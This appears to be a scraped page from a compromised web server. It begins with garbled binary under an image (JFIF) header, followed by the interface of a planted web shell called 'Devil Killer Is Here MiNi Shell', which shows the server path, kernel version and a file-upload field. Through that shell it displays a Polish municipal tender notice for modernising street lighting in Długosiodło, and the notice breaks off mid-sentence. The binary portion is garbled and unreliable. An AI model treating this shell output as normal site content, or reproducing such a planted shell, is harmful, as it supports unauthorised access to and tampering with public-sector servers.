JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230920/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230920/0040546801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja oświetlenia na terenie gminy Długosiodło </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Długosiodło</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 550668114</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">T. Kościuszki 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Długosiodło</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">07-210</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL924 - Ostrołęcki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 29 64 23 650</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 29 74 12 526</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">t.orlowski@dlugosiodlo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.dlugosiodlo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja oświetlenia na terenie gminy Długosiodło </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-602e7d05-577a-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00405468</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00021895/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.13 Modernizacja oświetlenia ulicznego na terenie gminy Długosiodło</p> <p class="mb-0">1.1.14 Modernizacja oświetlenia wewnętrznego i zawnętrznego na terenie gminy Długosiodło</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://dlugosiodlo.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://dlugosiodlo.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się za pośrednictwem Platformy zakupowej znajdującej<br/>się pod adresem: https://dlugosiodlo.ezamawiajacy.pl w zakładce „Korespondencja” lub poczty elektronicznej<br/>t.orlowski@dlugosiodlo.pl<br/>2) Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w<br/>terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków,<br/>zawiadomień oraz informacji przekazywanych na adres e-mail Zamawiającego przyjmuje się datę dostarczenia wiadomości na adres<br/>e-mail Zamawiającego. W przypadku skorzystania z Platformy za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji<br/>przyjmuje się datę ich złożenia/wysłania na Platformie.<br/>3) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi założyć darmowe konto na<br/>Platformie zakupowej. Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Gminy<br/>Długosiodło: https://dlugosiodlo.ezamawiajacy.pl lub https://oneplace.marketplanet.pl.<br/>Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie<br/>zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki<br/>procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „Zarejestruj się”.<br/>4) Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a<br/>Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem<br/>Platformy Zakupowej. Za datę przekazania zawiadomień oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki<br/>„Korespondencja”.<br/>5) Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca<br/>winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma Zakupowa Gminy Długosiodło tel. +48 22 257 22 23<br/>(infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail: oneplace@marketplanet.pl<br/>6) Zamawiający określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>􀀀 stały dostęp do sieci Internet o gwarantowanej przepustowości pobierania<br/>i wysyłania danych nie mniejszej niż 512 kb/s;<br/>􀀀 komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB RAM, procesor Intel IV 2GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>􀀀 zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji, w przypadku Internet<br/>Explorer minimalnie wersja 10.0;<br/>􀀀 włączona obsługa JavaScript;<br/>􀀀 zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>7) Zamawiający określa dopuszczalną wielkość przesyłanych plików do 100 MB.<br/>8) Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.: plik załączony przez Wykonawcę na Platformie<br/>Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku<br/>dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.<br/>9) Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego<br/>serwera synchronizowanego odpowiednim źródłem czasu.<br/>10) Osoby upoważnione do porozumiewania się z Wykonawcami: w zakresie merytorycznym: Andrzej Kuczyński, tel. 29 64 23 653,<br/>w zakresie formalno-prawnym: Tomasz Orłowski, tel. 29 64 23 656.<br/>11) Pozostałe wymagania dotyczące korespondencji zostały opisane w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016), dalej „RODO”, informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Gmina Długosiodło, ul. T. Kościuszki 2, 07-210 Długosiodło reprezentowana<br/>przez Wójta Gminy Długosiodło;<br/>2) Administrator powołał inspektora ochrony danych osobowych, z którym można skontaktować się pisząc na adres e-mail:<br/>gmina@dlugosiodlo.pl bądź pocztą tradycyjną na adres wskazany powyżej;<br/>3) dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie<br/>zamówienia publicznego – „Modernizacja oświetlenia na terenie gminy Długosiodło” prowadzonym w trybie podstawowym bez<br/>negocjacji, zawarciem, realizacją oraz egzekucją umowy;<br/>4) odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/>art. 18 i 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 ze zm.), dalej „ustawa<br/>Pzp”, upoważnieni pracownicy Urzędu Gminy oraz spółka Otwarty Rynek Elektroniczny S.A. siedzibą w Warszawie (02-672) przy ul.<br/>Domaniewskiej 49, wpisana do Rejestru Przedsiębiorców Krajowego Rejestru Sądowego, prowadzonego przez Sąd Rejonowy dla<br/>m.st. Warszawy<br/>w Warszawie XIII Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS: 0000041441, REGON: 017282436, NIP:<br/>526-25-35-153, jako właściciel Platformy Zakupowej, na której Gmina Długosiodło prowadzi postępowania o udzielenie zamówienia<br/>publicznego, działająca pod adresem: https://dlugosiodlo.ezamawiajacy.pl;<br/>5) wszelkie dane powierzone przez wykonawcę będą przechowywane przez okres wynikający z zapisów Rozporządzenia Prezesa<br/>Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w<br/>sprawie organizacji i zakresu działania archiwów zakładowych (Dz. U. z 2011 r., Nr 14, poz. 67 ze zm.),<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>8) posiada Pani/Pan:<br/>􀀀 na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>􀀀 na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>􀀀 na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>􀀀 prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>􀀀 w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>􀀀 prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>􀀀 na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zapisy dot. ochrony danych osobowych określono w rozdziale I pkt 14 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZ.271.16.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Część I: Wymiana 60 opraw oświetlenia ulicznego na terenie gminy Długosiodło<br/>Zadanie swoim zakresem obejmuje:<br/>•	wymianę opraw oświetlenia zewnętrznego ma trzpieniu słupa lub wysięgniku (demontaż istniejących opraw sodowych o mocy 70W, 125W na słupach (żerdziach) elektroenergetycznych żelbetowych oraz montaż nowych opraw oświetleniowych) – 60 kpl.,<br/>•	wymianę przewodów izolowanych w słupach oświetleniowych, rurach osłonowych, wysięgnikach – 60 kpl.,<br/>•	wymianę zacisków prądowych, bezpieczników 6A, gniazd bezpiecznika Bnu – 60 kpl.<br/>Zakres robót został określony w przedmiarze robót stanowiącym załącznik do SWZ. <br/>2. Zamawiający wymaga aby oferta obejmowała wszystkie roboty konieczne do prawidłowego wykonania przedmiotu zamówienia. W zakresie rzeczowym należy ująć wszystkie roboty niezbędne do zrealizowania zamówienia wynikające z Przedmiaru robót jak również w nim nie ujęte, niezbędne do prawidłowego wykonania przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji określonego w art. 441 ust. 1 ustawy Prawo zamówień publicznych. Realizacja prawa opcji polegać będzie na zwiększeniu maksymalnie o 20% ilości opraw oświetlenia ulicznego podlegających wymianie.<br/>2.	Prawo opcji, o którym mowa w ust. 1 realizowane będzie na następujących zasadach:<br/>a)	realizowane będzie na takich samych warunkach jak zamówienie podstawowe,<br/>b)	cena jednostkowa wymiany opraw oświetlenia ulicznego w ramach prawa opcji będzie identyczna jak zamówienia podstawowego,<br/>c)	o zamiarze skorzystania z prawa opcji, Zamawiający poinformuje wykonawcę odrębnym pismem/oświadczeniem,<br/>d)	Zamawiający może z opisanego w SWZ prawa opcji skorzystać w całości lub w części,<br/>e)	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego, dlatego też nieskorzystanie przez Zamawiającego z prawa opcji nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego,<br/>f)	zamówienie objęte prawem opcji Wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu zawiadomienia od Zamawiającego, że zamierza z prawa opcji skorzystać, zawierającego liczbę opraw oświetlenia ulicznego podlegających wymianie w ramach przedmiotowego uprawnienia Zamawiającego,<br/>g)	termin wykonania zamówienia objętego prawem opcji nie może być dłuższy niż 21 dni od dnia przesłania zawiadomienia do Wykonawcy,<br/>h)	Zamawiający zastrzega, że ilość opraw oświetlenia ulicznego podlegających wymianie przewidziana w ramach prawa opcji jest wielkością maksymalną, a ilości te mogą ulec zmniejszeniu w zależności od potrzeb Zamawiającego w trakcie trwania umowy,<br/>i)	Zamawiający jest uprawniony do skorzystania z prawa opcji w okresie do trzech miesięcy, licząc od dnia zawarcia umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/><br/>Lp.	Opis kryterium oceny	Znaczenie (%)<br/>1. Cena brutto oferty (C)	60%<br/>2.	Okres udzielonej gwarancji (G)	40%<br/>	Razem	100%<br/><br/>Oferty będą oceniane metodą punktową w skali 100-punktowej przez komisję przetargową. <br/><br/>CENA<br/>Cena będzie oceniana metodą punktową wg wzoru: <br/>Cena najniższa ze wszystkich ofert × 100 pkt × Znaczenie kryterium 60%/<br/>Cena oferty badanej<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/><br/>OKRES UDZIELONEJ GWARANCJI<br/><br/>Liczba punktów w kryterium okres udzielonej gwarancji będzie przyznawana <br/>w następujący sposób:<br/>1) 3 lata – 0 pkt;<br/>2) 4 lata – 20 pkt;<br/>3) 5 lat – 40 pkt.<br/><br/>Złożenie oferty jest jednoznaczne z przyjęciem przez Wykonawcę przynajmniej minimalnego okresu gwarancji równego 3 lata. W przypadku kiedy Wykonawca nie określi w formularzu ofertowym okresu udzielonej gwarancji Zamawiający przyjmuje, że Wykonawca deklaruje okres 3 lat gwarancji, a w kryterium otrzyma 0 pkt. <br/>Wykonawca na formularzu ofertowym deklaruje okres udzielonej gwarancji.<br/><br/>Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów (S) stanowiących sumę punktów przyznanych w każdym kryterium z uwzględnieniem wagi procentowej danego kryterium, obliczonych wg wzoru:<br/>S= C+G<br/>gdzie:<br/>S – łączna ocena punktowa<br/>C – liczba uzyskanych punktów w kryterium cena<br/>G – liczba uzyskanych punktów w kryterium okres udzielonej gwarancji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Część II: Wymiana 100 opraw oświetlenia ulicznego na terenie gminy Długosiodło<br/>Zadanie swoim zakresem obejmuje:<br/>•	wymianę opraw oświetlenia zewnętrznego ma trzpieniu słupa lub wysięgniku (demontaż istniejących opraw sodowych o mocy 70W, 125W na słupach (żerdziach) elektroenergetycznych żelbetowych oraz montaż nowych opraw oświetleniowych) – 100 kpl.,<br/>•	wymianę przewodów izolowanych w słupach oświetleniowych, rurach osłonowych, wysięgnikach – 100 kpl.,<br/>•	wymianę zacisków prądowych, bezpieczników 6A, gniazd bezpiecznika Bnu – 100 kpl.<br/>Zakres robót został określony w przedmiarze robót stanowiącym załącznik do SWZ. <br/>2) Zamawiający wymaga aby oferta obejmowała wszystkie roboty konieczne do prawidłowego wykonania przedmiotu zamówienia. W zakresie rzeczowym należy ująć wszystkie roboty niezbędne do zrealizowania zamówienia wynikające z Przedmiaru robót jak również w nim nie ujęte, niezbędne do prawidłowego wykonania przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji określonego w art. 441 ust. 1 ustawy Prawo zamówień publicznych. Realizacja prawa opcji polegać będzie na zwiększeniu maksymalnie o 20% ilości opraw oświetlenia ulicznego podlegających wymianie.<br/>2.	Prawo opcji, o którym mowa w ust. 1 realizowane będzie na następujących zasadach:<br/>a)	realizowane będzie na takich samych warunkach jak zamówienie podstawowe,<br/>b)	cena jednostkowa wymiany opraw oświetlenia ulicznego w ramach prawa opcji będzie identyczna jak zamówienia podstawowego,<br/>c)	o zamiarze skorzystania z prawa opcji, Zamawiający poinformuje wykonawcę odrębnym 